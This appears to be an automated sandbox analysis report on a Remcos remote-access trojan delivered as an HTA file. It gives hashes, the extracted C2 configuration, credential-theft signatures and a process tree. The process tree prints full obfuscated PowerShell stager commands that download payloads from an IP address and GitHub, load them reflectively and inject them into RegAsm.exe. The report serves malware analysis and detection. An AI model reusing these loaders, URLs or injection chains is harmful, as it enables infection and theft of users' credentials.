remcos | b2c7816147d7816cf870f2088aa7be410616f1b639214904a56e49e580c89580

Analysis

max time kernel
147s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-10-2024 12:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.hta
Size

118KB
MD5

3734b6b1d8a5b84814fa08ce7b1ef6c7
SHA1

b89ece297f8abe5e32931f3589d572f50b5036a8
SHA256

b2c7816147d7816cf870f2088aa7be410616f1b639214904a56e49e580c89580
SHA512

add36444b8322aac9b7300081dd67a7d887427dd1d9d0c71115f1a2f4f9427e88b38b7c2158e715e6200fcc794d529611c9f4ac81c7ff10d86a9c996ac01ef8e
SSDEEP

96:Eam73N7J8BZ7t8BIyEQ2XVVAfUFup/JJ5757N8BnL7i7T:Ea23N7u7nyEQUVA8cb757qL74T

Score

10^/10

remcos authur collection defense_evasion discovery execution rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Extracted

Family

remcos

Botnet

authur

authurremc.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-7B1J99
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4624-120-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4280-122-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/1708-119-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4624-120-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/1708-119-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
21	3092	powershell.exe
24	2304	powershell.exe
26	2304	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2500	powershell.exe
2304	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
440	cmd.exe
3092	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	raw.githubusercontent.com
23	raw.githubusercontent.com

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2304 set thread context of 1044	2304	powershell.exe	106
PID 1044 set thread context of 1708	1044	RegAsm.exe	110
PID 1044 set thread context of 4624	1044	RegAsm.exe	112
PID 1044 set thread context of 4280	1044	RegAsm.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3092	powershell.exe
3092	powershell.exe
2500	powershell.exe
2500	powershell.exe
2304	powershell.exe
2304	powershell.exe
1708	RegAsm.exe
1708	RegAsm.exe
4280	RegAsm.exe
4280	RegAsm.exe
1708	RegAsm.exe
1708	RegAsm.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1044	RegAsm.exe
1044	RegAsm.exe
1044	RegAsm.exe
1044	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	4280	RegAsm.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 1164 wrote to memory of 440	1164	mshta.exe	85
PID 1164 wrote to memory of 440	1164	mshta.exe	85
PID 1164 wrote to memory of 440	1164	mshta.exe	85
PID 440 wrote to memory of 3092	440	cmd.exe	87
PID 440 wrote to memory of 3092	440	cmd.exe	87
PID 440 wrote to memory of 3092	440	cmd.exe	87
PID 3092 wrote to memory of 2000	3092	powershell.exe	94
PID 3092 wrote to memory of 2000	3092	powershell.exe	94
PID 3092 wrote to memory of 2000	3092	powershell.exe	94
PID 2000 wrote to memory of 3180	2000	csc.exe	95
PID 2000 wrote to memory of 3180	2000	csc.exe	95
PID 2000 wrote to memory of 3180	2000	csc.exe	95
PID 3092 wrote to memory of 2800	3092	powershell.exe	99
PID 3092 wrote to memory of 2800	3092	powershell.exe	99
PID 3092 wrote to memory of 2800	3092	powershell.exe	99
PID 2800 wrote to memory of 2500	2800	WScript.exe	100
PID 2800 wrote to memory of 2500	2800	WScript.exe	100
PID 2800 wrote to memory of 2500	2800	WScript.exe	100
PID 2500 wrote to memory of 2304	2500	powershell.exe	102
PID 2500 wrote to memory of 2304	2500	powershell.exe	102
PID 2500 wrote to memory of 2304	2500	powershell.exe	102
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 2304 wrote to memory of 1044	2304	powershell.exe	106
PID 1044 wrote to memory of 1708	1044	RegAsm.exe	110
PID 1044 wrote to memory of 1708	1044	RegAsm.exe	110
PID 1044 wrote to memory of 1708	1044	RegAsm.exe	110
PID 1044 wrote to memory of 1708	1044	RegAsm.exe	110
PID 1044 wrote to memory of 4976	1044	RegAsm.exe	111
PID 1044 wrote to memory of 4976	1044	RegAsm.exe	111
PID 1044 wrote to memory of 4976	1044	RegAsm.exe	111
PID 1044 wrote to memory of 4624	1044	RegAsm.exe	112
PID 1044 wrote to memory of 4624	1044	RegAsm.exe	112
PID 1044 wrote to memory of 4624	1044	RegAsm.exe	112
PID 1044 wrote to memory of 4624	1044	RegAsm.exe	112
PID 1044 wrote to memory of 4280	1044	RegAsm.exe	113
PID 1044 wrote to memory of 4280	1044	RegAsm.exe	113
PID 1044 wrote to memory of 4280	1044	RegAsm.exe	113
PID 1044 wrote to memory of 4280	1044	RegAsm.exe	113

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1164
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poWERSHElL.eXe -ex bYPASs -nop -w 1 -C devIcEcredENtialdEPLoymeNT.EXe ; iEx($(iEX('[SysTem.TEXT.encOdING]'+[cHaR]58+[char]0x3A+'utf8.GetsTring([sYSTeM.CONvErt]'+[cHar]0X3A+[ChAR]58+'froMBaSE64STRiNg('+[Char]34+'JDdwV281R0xJNyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1CRVJERUZJbklUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUG1aTlB0QUhibSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1VWix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMZkhULEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZXNaVHApOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYU5oIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN3BXbzVHTEk3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTg1LjI5LjExLjExMS80NTUvbmljZXBjaXR1cmV3aXRoZ3JlYXRwZXJzb25lbnRpcmV0aW1lLnRJRiIsIiRlTlY6QVBQREFUQVxuaWNlcGNpdHVyZXdpdGhncmVhdHBlcnNvbmVudGlyZXRpbWUudmJzIiwwLDApO1N0QVJ0LVNMZWVQKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXG5pY2VwY2l0dXJld2l0aGdyZWF0cGVyc29uZW50aXJldGltZS52YnMi'+[cHar]0X22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:440
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWERSHElL.eXe -ex bYPASs -nop -w 1 -C devIcEcredENtialdEPLoymeNT.EXe ; iEx($(iEX('[SysTem.TEXT.encOdING]'+[cHaR]58+[char]0x3A+'utf8.GetsTring([sYSTeM.CONvErt]'+[cHar]0X3A+[ChAR]58+'froMBaSE64STRiNg('+[Char]34+'JDdwV281R0xJNyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1CRVJERUZJbklUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUG1aTlB0QUhibSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1VWix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMZkhULEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZXNaVHApOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYU5oIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN3BXbzVHTEk3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTg1LjI5LjExLjExMS80NTUvbmljZXBjaXR1cmV3aXRoZ3JlYXRwZXJzb25lbnRpcmV0aW1lLnRJRiIsIiRlTlY6QVBQREFUQVxuaWNlcGNpdHVyZXdpdGhncmVhdHBlcnNvbmVudGlyZXRpbWUudmJzIiwwLDApO1N0QVJ0LVNMZWVQKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXG5pY2VwY2l0dXJld2l0aGdyZWF0cGVyc29uZW50aXJldGltZS52YnMi'+[cHar]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3092
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\id2aomlf\id2aomlf.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2000
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA587.tmp" "c:\Users\Admin\AppData\Local\Temp\id2aomlf\CSC4FB99AA89CA54F47BCD9A75AFE55EA61.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3180
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepciturewithgreatpersonentiretime.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2800
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRQc0hPbUVbMjFdKyRQU0hvTWVbMzBdKydYJykoKCcydmxpbWFnZVVybCA9IFhwbGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZWEnKydkcy9tYWluL0RldGFoTm90ZV9WLmpwZyBYcGw7MnZsd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsydmwnKydpbWFnZUJ5dGVzID0gMnZsd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgydmxpbWFnZVVybCk7MnZsaW1hZ2VUZXh0ID0nKycgJysnW1N5c3QnKydlbS5UJysnZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMnZsaW0nKydhZ2VCeXRlcyk7MnZsc3RhcicrJ3RGbGFnID0gWHBsPDxCQVNFNjRfU1RBUlQ+PlhwbDsydmwnKydlbmRGbGFnID0gWHBsPDxCQVNFNjRfRU5EPj5YcGw7MnZsc3RhcnRJbmRleCA9IDJ2bGltYWcnKydlVGV4dC5JbmRleE9mKDJ2bHN0YXJ0RmxhZyk7MnZsZW5kSW5kZXggPSAydmxpbWFnZVRleHQuSW5kZXhPZigydmxlbmRGbGFnKTsydmxzdGFydEluZGV4IC1nZSAwIC1hbicrJ2QgMnZsZW4nKydkSW5kZXggLWd0IDJ2bHN0YXJ0SW5kZXg7MnZsc3RhcnRJbmRleCArPSAydmxzdCcrJ2FydEZsYWcuTGVuJysnZ3RoOzJ2bGJhc2U2NCcrJ0xlbmd0aCA9IDJ2bGVuZEluZGV4IC0gMnZsc3RhcnRJbmRleDsydicrJ2xiYXNlNjRDb21tYW5kID0gMnZsaW0nKydhZ2VUZXh0LlN1YnN0cmluZygydmxzdGFydCcrJ0luZGV4LCAydmxiYXNlNjRMZW5ndGgpOzJ2bGMnKydvJysnbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06JysnOkZyb21CYXNlNjRTdHJpbmcoMnZsYmFzZTY0Q29tbWFuZCk7MnZsbG9hZGVkJysnQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3RpJysnbycrJ24uQXNzZW1ibHldOjpMb2FkKDJ2bGNvbW1hbmRCeXRlcyk7MnZsdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChYcGxWQUknKydYcGwpOzJ2bHZhaU1ldGhvZC5JbicrJ3Zva2UoMnZsbnUnKydsbCwgQChYcGx0eHQuR1RGRkdSLzU1NC8xMTEuMTEuOTIuNTgxLy86cHR0aFhwbCwgWHBsZGVzYXRpdmFkbycrJ1hwbCwgWHBsZGVzYXRpdmFkb1hwbCwgWHBsZGVzYXQnKydpdmFkb1hwbCwgWHBsUmVnQXNtWHBsLCBYcGxkZXNhdGl2YWRvWHBsLCBYcCcrJ2xkZXNhdGl2YScrJ2RvWHBsKSk7JykuckVwTEFjZSgoW2NIQVJdNTArW2NIQVJdMTE4K1tjSEFSXTEwOCksJyQnKS5yRXBMQWNlKChbY0hBUl04OCtbY0hBUl0xMTIrW2NIQVJdMTA4KSxbc3RyaU5nXVtjSEFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2500
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PsHOmE[21]+$PSHoMe[30]+'X')(('2vlimageUrl = Xplhttps://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/hea'+'ds/main/DetahNote_V.jpg Xpl;2vlwebClient = New-Object System.Net.WebClient;2vl'+'imageBytes = 2vlwebClient.DownloadData(2vlimageUrl);2vlimageText ='+' '+'[Syst'+'em.T'+'ext.Encoding]::UTF8.GetString(2vlim'+'ageBytes);2vlstar'+'tFlag = Xpl<<BASE64_START>>Xpl;2vl'+'endFlag = Xpl<<BASE64_END>>Xpl;2vlstartIndex = 2vlimag'+'eText.IndexOf(2vlstartFlag);2vlendIndex = 2vlimageText.IndexOf(2vlendFlag);2vlstartIndex -ge 0 -an'+'d 2vlen'+'dIndex -gt 2vlstartIndex;2vlstartIndex += 2vlst'+'artFlag.Len'+'gth;2vlbase64'+'Length = 2vlendIndex - 2vlstartIndex;2v'+'lbase64Command = 2vlim'+'ageText.Substring(2vlstart'+'Index, 2vlbase64Length);2vlc'+'o'+'mmandBytes = [System.Convert]:'+':FromBase64String(2vlbase64Command);2vlloaded'+'Assembly = [System.Reflecti'+'o'+'n.Assembly]::Load(2vlcommandBytes);2vlvaiMethod = [dnlib.IO.Home].GetMethod(XplVAI'+'Xpl);2vlvaiMethod.In'+'voke(2vlnu'+'ll, @(Xpltxt.GTFFGR/554/111.11.92.581//:ptthXpl, Xpldesativado'+'Xpl, XpldesativadoXpl, Xpldesat'+'ivadoXpl, XplRegAsmXpl, XpldesativadoXpl, Xp'+'ldesativa'+'doXpl));').rEpLAce(([cHAR]50+[cHAR]118+[cHAR]108),'$').rEpLAce(([cHAR]88+[cHAR]112+[cHAR]108),[striNg][cHAR]39) )"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2304
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1044
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\iolboffezolhfkwbheqljndnrcce"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1708
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\tqqtopqynwdmqyknzodmmzyeajlnzxy"
        8⤵
        
        PID:4976
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\tqqtopqynwdmqyknzodmmzyeajlnzxy"
        8⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4624
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\dkem"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
68b6cf33ee4311060bf8192cc0cf133f

SHA1
ed274574dbbcc78258778f1296f1f08d4371018c

SHA256
c508097fddec078a2fd45bc6e0c7dad45885e092714b77172d5347cf548d68cb

SHA512
db3e187dcac4a0c97d2838c0d6d23af14bb5b46237db9ba560990c7cad2d3f1fdd8c787745c86b59424d41be01b967c74fa0a8ae7251159e05d2337f3ae38a4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
3a6e94b04f37416bc0c0791e01de2a86

SHA1
919224c2e120c03506a2318b70c94d7b3ba2d617

SHA256
073d99d7a944b0cfe19e0865c45ac42a14b6617da6c663394fa1e655fd4fedb3

SHA512
99393cc5658197e85301fd1538f068ca2bda2f7286a1b93834445fb7c07f8ee4e7bb1fcf54875d2fb4cb5990718d4e5978f8cf41a50efc7150e60daed6c94c8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA587.tmp

Filesize
1KB

MD5
c5ae9e2558d9e1a364d4da58eb12a1a7

SHA1
d054030952d3f38f1bf1f483a2aa47a3e9a12fbe

SHA256
711a1bff286e4047275135d47f59baf42a8984329eb8136191c8f02f4a169e30

SHA512
9f11bc4db9dce74e4a49f1a57289c70171ec2a61a3f988df493f5900b3e9f782ec0a82aa40c695a239d8e02fc634234cf74301b821bc23d888c095d57c46b909

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i51gwrca.ou2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\id2aomlf\id2aomlf.dll

Filesize
3KB

MD5
ee81c36ec0e1b69daceb916833661a7f

SHA1
4743eb1d7b6ecb0d952c16afc78c7ef79c386c60

SHA256
291c3d9e1c48987e53314f36ed68079e27bed69607e12afa4af1447016d7695f

SHA512
942b40c06811fe6edd939a0ee438f46f03ea0e07eee4fd9732f08656ab9e9ef0eaa1dff1c0e046b4222d007bc23840f35fbb144ab91133851db67342a0abb7f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolboffezolhfkwbheqljndnrcce

Filesize
4KB

MD5
ac300aeaf27709e2067788fdd4624843

SHA1
e98edd4615d35de96e30f1a0e13c05b42ee7eb7b

SHA256
d2637d58bb120dc6fefe2f38d6e0d4b308006b8639106a7f9e915fa80b5cc9d9

SHA512
09c46e708f9d253dccd4d943639d9f8126f868ae3dcd951aad12222bb98b5d3814676f878c8391b9bdab5dedcf5b9e9eaeb2ad3ffec57bda875198735586d4df

Download Submit
C:\Users\Admin\AppData\Roaming\nicepciturewithgreatpersonentiretime.vbs

Filesize
190KB

MD5
fe83bed7c8827ff5eaa548d1be494b19

SHA1
4d182e58cf11dd0f29b67492d3c0dd856e9e72db

SHA256
09cf6e4d4e7e8e5274be9c7d5bf4cd38a0744844a3a76203cce98db262607c4d

SHA512
16054b819730c55587f49f348eb3b587b6492620dd26169b48dfed7d1d3eb7936b657a4e01a848a77988578dce81fddfb9fe0e8d7fd23d3774943c3d6387f050

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\id2aomlf\CSC4FB99AA89CA54F47BCD9A75AFE55EA61.TMP

Filesize
652B

MD5
332ab142501c7630a7f9ffaf53117f4c

SHA1
d8bc2bb56821fdd6734e101b9be10c7cca002b17

SHA256
bb7fa5a732229415c6feea02c2805145db89d7136eafebe8a9bb32e5b4527a10

SHA512
ef50f64dd0a3bd09b32dd82f3fe802756048253d67bca77a95ac64db29a735a5bef1c6c5fdb7cc9dbf3eb9bb2d9616289da622ca7106912da1480e5ae38cee48

